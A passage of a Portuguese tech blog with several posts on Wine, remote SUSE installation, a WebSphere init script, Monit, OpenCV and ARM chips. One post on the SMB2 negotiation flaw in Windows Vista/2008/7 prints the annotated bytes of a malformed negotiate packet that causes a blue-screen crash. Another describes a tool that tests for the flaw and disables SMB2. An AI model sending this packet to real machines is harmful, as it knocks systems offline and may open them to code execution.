Wine: Adeus partição windows…

Como mencionei diversas  vezes,  não gosto do Windows. Entretanto tenho que utiliza-lo por 2 motivos:

  • Treinar Helimodelismo no AeroFly Professional Deluxe;
  • Prover  solução Windows  para  o mercado com o compilador Visual Studio C++.

Estou testando o Wine… na  primeira fase, onde instalei o  Simulador de  Helicóptero, tudo funcionou bem. Na próxima fase, irei configurar  o rádio controle do helicóptero Blade CX2. Em  paralelo vou testar instalar o  Microsoft Visual Studio 2005.  Postarei todos os  resultados aqui no Blob.

Veja a  seguir, o screenshot  do OpenSuse 11.1  executando o AeroFly!

wine

Instalação remota do Suse/OpenSuse.

Instalar o  sistema Suse/OpenSuse remotamente com  o protocolo ssh ou vnc é muito simples. Basta inserir alguns parâmetros na  opção de boot do grub. A  seguir  os  principais  parâmetros:

Instalação  remota com  o protocolo vnc:

vnc=1 vncpassword=install

15568-1

Instalação remota com  o  protocolo ssh:

ssh=1 sshpassword=install

Configuração IP da  rede estático:

hostip = 192.168.10.10 netmask = 255.255.255.0
gateway = 192.168.10.1 nameserver = 192.168.10.1

Para conectar com o equipamento e iniciar a instalação via SSH:

cabelo@server2:~ #  ssh -X root@192.168.1010.

The authenticity of host '192.168.10.10 (192.168.10.10)' can't be established.

DSA key fingerprint is d3:8e:48:6c:5a:e4:45:ac:80:d9:7f:bc:16:a3:7a:a3.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '192.168.10.10' (DSA) to the list of known hosts.

root@192.168.10.10's password:
SUSE Linux Enterprise Server 10 Installation
/usr/X11R6/bin/xauth:  creating new authority file /root/.Xauthority
#Welcome to the inst-sys...
Linux 192.168.0.2 2.6.16.21-0.8-default #1 Mon Jul 3 18:25:39 UTC 2006 i686 athlon i386 GNU/Linux
/root
run yast to start the installation
inst-sys:~ #  yast2

Iniciar e parar o WebSphere com script no init.d.

Cansado de  parar e levantar  o WebSphere da IBM manualmente no SLES 10 SP1, resolvi escrever um script e coloca-lo no  init.d.  Vejam  o resultado :

# rcwas status
Checking for WebSphere Aplication Server                              unused
# rcwas start
Starting WebSphere Aplication Server                                  done
# rcwas status
Checking for WebSphere Aplication Server                              running
# rcwas stop
Shutting WebSphere Aplicaton Server                                   done
 # rcwas status
Checking for WebSphere Aplication Server                              unused

A seguir o  Script:

#!/bin/bash
# Script de inicialização do IBM WebSphere Application Server
# Author: Alessandro de Oliveira Faria (A.K.A. CABELO)
# Required-Start:
# X-UnitedLinux-Should-Start:
# Required-Stop:
# Default-Start:  3 5
# Default-Stop:
# Description:    Servico WebSphere Aplication Server
### END INIT INFO

WAS_FILE=/opt/IBM/WebSphere/AppServer/bin/startServer.sh
WAS_STOP=/opt/IBM/WebSphere/AppServer/bin/stopServer.sh
BIN_FILE="/opt/IBM/WebSphere/AppServer/java/bin/java"
PID_FILE="/opt/IBM/WebSphere/AppServer/profiles/AppSrv01/logs/server1/server1.pid"
. /etc/rc.status
RETVAL=0
case "$1" in
 start)
 echo -n "Starting WebSphere Aplication Server "
 checkproc -p ${PID_FILE} ${BIN_FILE}
 case $? in
 0) echo -n "Warning: daemon already running." ;;
 1) echo -n "- Warning: ${PID_FILE} exists. " ;;
 esac
 startproc -p ${PID_FILE} ${WAS_FILE} server1  > /dev/null
 rc_status -v
 ;;
 stop)
 echo -n "Shutting WebSphere Aplicaton Server "
 checkproc -p ${PID_FILE} ${BIN_FILE} || \
 echo -n " Warning: daemon not running. "
 ${WAS_STOP} server1 -username USER -password PASSWORD > /dev/null
 rc_status -v
 ;;
 status)
 echo -n "Checking for WebSphere Aplication Server "
 checkproc -p ${PID_FILE} ${BIN_FILE}
 rc_status -v
 ;;
 restart)
 stop
 start
 ;;
*)
 echo $"Usage: $0 {start|stop|status|restart}"
 exit 1
esac
exit $RETVAL

bsodTest: Protegendo-se da vulnerabilidade no Windows Vista/Server 2008 e 7.

Não gosto do Windows e ponto final. Mas gostos de muitas  pessoas que utilizam Windows (infelizmente)… Imaginem a minha irmã ( a neném ) por exemplo, trabalhando em seu desktop, e um engraçadinho enviar um pacote de negociação SMB2 adulterado para a  sua máquina (mencionado no post anterior) ! Como quase todo  usuário não tem o hábito de salvar periodicamente os seus trabalhso durante a elaboração, provalvelmente será perdido todo o  esfoço  com  a famosa tela azul da morte.

Sendo assim elaborei um pequeno e  modesto programa  para desabilitar o protocolo SMB2 ( assim forçando  o uso do SMB1 ).   Qualquer técnico  para  fazer isto manualmente mas  usuários convencionais podem cometer erros  graves  ao efetuar esta tarefa.

bsodTest, foi o  nome atribuído ao projeto,  disponibilizado no Source Forge.net! Primeiramente, baixe o  executável e o execute como administrador do sistema.

01

ATENÇÃO: FECHE TODOS OS  PROGRAMAS  !!! E logo  a seguir, faça o download e descompacte o  arquivo .zip e execute  o programa com o parâmetro -testbug. Para testar a vulnerabilidade no seu sistema  operacional.

02Se  o seu sistema não apresentar a tela azul, significa que você pode ignorar  o restante do texto. Caso contrário, execute novamente  o programa (após  o boot da tela azul) com  o parâmetro -fixbug e faça  o  teste novamente.

05

Pronto ! Agora o protocolo de  negociaçao SMB2 esta desabilitado. Esta é uma alternativa para não deixar a sua máquina vulnerável até a correção  ser  liberada pelo fabricante do sistema operacional.

Detectando Face em tempo real com o FLASH.

Conforme mencioneir ao iniciar as pesquisas sobre vídeo captura na web ( browser ) no post anterior, as pesquisas sobre vídeo captura na web ( browser ) vem evoulindo  na  NETi TECNOLOGIA. Atualmente testei com sucesso  projetos em  ActionScript 3 para detectar face em tempo real das  imagens capturada em WebCam. Existem ínumeros  projeto baseado  no algoritmo da  biblioteca  OpenCV. Entre  muitos  projetos,  encontrei o Marilena e FaceIt. Clique neste link  demonstrativo para  testar a  tecnologia.  E  a  seguir um vídeo no Youtube.

Leia também:

vjdetector – Project Hosting on Google Code
AS3 Face Detection BASED on OpenCV-1

AS3 Face Detection BASED on OpenCV-2

AS3 Face Detection BASED on OpenCV-3
LiveExamples – deface – Project Hosting on Google Code
Real-time Face Detection in Flash – squidder.com
Face Detection
Optimizing Flash Based Face Detection
Projeto Marilena
Projeto FaceIt

Gerenciamento e monitoramento com Monit.

Monit é um utilitário open-source para gerenciar e monitorar processos, arquivos, diretórios e sistema de arquivos em sistemas operacionais baseados no UNIX. A sua interface web proporciona além do monitoramento, reparos e mensagens de alerta ao administrador.

A seguir os passos para instalação no OpenSuse:

Baixe o pacote rpm e instale com o comando rpm -ivh:

# http://download.opensuse.org/repositories/server:/monitoring/openSUSE_11.1/x86_64/monit-5.0.3-1.1.x86_64.rpm
# rpm -ivh monit-5.0.3-1.1.x86_64.rpm

Após a instalação, inicie o serviço conforme o  exemplo abaixo:

# rcmonit restart
Shutting down monit                                                          done
Starting monit Starting monit daemon with http interface at [*:2812]
                                                                             done
                                                                             done
#

Mais detalhes sobre a instalação e configuração do pacote,  clique AQUI!

monit

Monit is a free open source utility for managing and monitoring, processes, files, directories and filesystems on a UNIX system. Monit conducts automatic maintenance and repair and can execute meaningful causal actions in error situations.

OpenCV 2.0.0 – Saiu do forno!

opencvHoje, 01 de outubro,  durante a madruga, durante a conversa com  a minha amiga  Renata Padovan no msn, resolvi em paralelo visitar o  source forge e  SURPRESA!  Lá estava disponível a versão 2.0.0  da biblioteca OpenCV.

Entre inúmeras novidades,  a seguir as principais comparada  a versão 1.o:

  • Interface em C++;
  • Repositporio migrado  para SubVersion;
  • Rotinas mais performáticas;
  • Otimizações para MMX/SSE/SSE2/SSE3;
  • Treinamento em multithread (qundo compilado com OpenMP);
  • e muitas outras novidades…

Mais informações AQUI!

Vulnerabilidade no Windows 2008/Vista e 7!

bsodJogando conversar fora e tomando uma cerveja com o Carlão (Carlos Barcellos), ele mencionou sobre uma falha de  negociação no protocolo SMB2 do Windows. Na hora não dei muita atenção, pois pensei que tal  vulnerabilidade não atingiria as maquinas com o sistema operacional atualizado. Para a  minha surpresas, todas as máquinas submetidas ao teste sofreram a famosa BSOD (blue screen of death)  seguido do desligamento imediato.

A vulnerabilidade ocorre no protocolo SMB2 (Server Message Block — versão 2) da Microsoft,  localizado na camada de rede, utilizado geralmente para o acesso aos recursos compartilhados e autenticação IPC (Comunicação Inter-Processo).

Este  protocolo é o padrão de compartilhamento de arquivos entre computadores rodando Windows, e especificamente a versão 2 (SMB2) pode ser derrubada por um código de prova de conceito. Por questões éticas não disponibilizarei  o código. A seguir a lista das versão comprometidas:

  • Windows 7 (32 e 64 bits);
  • Vista, Vista SP1, Vista SP2 (32 e 64 bits);
  • Windows 2008, e 2008 SP2 (32 e 64 bits, e Itanium-based).

“Esse método ataca via negociação de requisição de protocolo (negotiate protocol request) que é a primeira query enviada pelo SMB. A vulnerabilidade está presente apenas nas versões de Windows que incluem o Server Message Block 2.0 e tem o protocolo ativado. O sucesso no ataque não requer acesso local na máquina e resulta na Tela Azul da Morte (Blue Screen of Death).”

smb

A seguir, uma versão do pacote modificado:

 0x01, 0x00, 0x00, 0x90, // Cabecalho
 0xff, 0x53, 0x4d, 0x42, // String SMB
 0x72, 0x00, 0x00, 0x00, // Protocolo de negociacao
 0x00, 0x18, 0x53, 0xc8, // Codigo operacao 0x18 & sub 0xc853
 0x00, 0x26,             // Valor antigo esperado pelo protocolo "\x00\x00"
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xfe,
 0x00, 0x00, 0x00, 0x00, 0x00, 0x6d, 0x00, 0x02, 0x50, 0x43, 0x20, 0x4e, 0x45, 0x54,
 0x57, 0x4f, 0x52, 0x4b, 0x20, 0x50, 0x52, 0x4f, 0x47, 0x52, 0x41, 0x4d, 0x20, 0x31,
 0x2e, 0x30, 0x00, 0x02, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 0x30, 0x00,
 0x02, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x66, 0x6f, 0x72, 0x20, 0x57,
 0x6f, 0x72, 0x6b, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x73, 0x20, 0x33, 0x2e, 0x31, 0x61,
 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4c,
 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x32, 0x2e, 0x31, 0x00, 0x02, 0x4e, 0x54, 0x20, 0x4c,
 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00, 0x02, 0x53, 0x4d, 0x42, 0x20, 0x32, 0x2e,
 0x30, 0x30, 0x32, 0x00
OBS: Como mencionou o José Mateus Ucelli, quem conseguir controlar esse ponteiro na hora do estouro da pilha, pode apontar para execuçao de qualquer programa na memória…

OBS2: Sugiro aos usuários Windows (credo!) ficarem atentos com relação ao problema, e consequentemente  buscarem a  solução o mais breve possível junto ao fornecedor do sistema operacional. Pois códigos maliciosos surgirão de forma exponencial.

Fontes de informação:
Hack A Day

ARM Cortex A9 MPCore: processador dual-core de 2GHz

Uma nova versão do processador ARM (Advanced RISC Machine) surge com velocidade de 2GHz e uma arquitectura de 40 nanómetros. Com isto o processador Cortex A9 MPCore entrar na competição direta com o Atom, da Intel. Informações sobre esta criança, afirma que o seu novo processador consegue cinco vezes mais desempenho do que o rival e ainda consome menos energia.

A ARM menciona que este novo processador não impõe qualquer tipo de limitações aos fabricantes de hardware, apenas não suporta o sistema Windows (ainda bem…). Imaginem a capacidades dos futuros smartphones com este processador rodando SymbianOS ou Linux.

Fonte : http://www.arm.com

Print